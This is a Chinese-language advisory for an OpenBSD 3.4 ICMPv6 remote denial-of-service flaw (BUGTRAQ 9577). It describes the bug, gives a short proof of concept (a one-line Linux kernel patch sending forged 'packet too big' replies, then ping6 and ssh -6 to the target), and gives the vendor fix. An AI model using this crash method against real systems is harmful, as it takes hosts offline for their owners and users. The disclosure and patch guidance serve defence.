OpenBSD ICMPV6处理远程拒绝服务攻击漏洞受影响系统:
OpenBSD OpenBSD 3.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9577
OpenBSD是一款开放源代码操作系统。
OpenBSD在处理部分ICMPV6通信时存在问题,远程攻击者可以利用这个漏洞对主机系统进行拒绝服务攻击。
如果OpenBSD系统配置为能接收icmpv6通信,就可能存在拒绝服务攻击,通过设置小的ipv6 mtu,然后进行tcp连接,就可以导致目标OpenBSD崩溃。
<*来源:Georgi Guninski (guninski@guninski.com)
链接:http://www.guninski.com/obsdmtu.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Georgi Guninski (guninski@guninski.com)提供了如下测试方法:
对Linux进行如下修改:
linux kernel 2.4.24 net/ipv6/icmp.c :
case ICMPV6_ECHO_REPLY:
/* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro
然后
ping6 openbsd
ssh -6 openbsd
建议:
--------------------------------------------------------------------------------
厂商补丁:
OpenBSD
-------
用户可以从CVS中下载修正版本为1.82的/src/sys/netinet6/ip6_output.c文件,然后重新编译内核。
供应商已经发布OpenBSD 3.4-stable和3.3-stable的补丁,建议用户升级:
http://www.openbsd.org/
推荐
评论(0条)
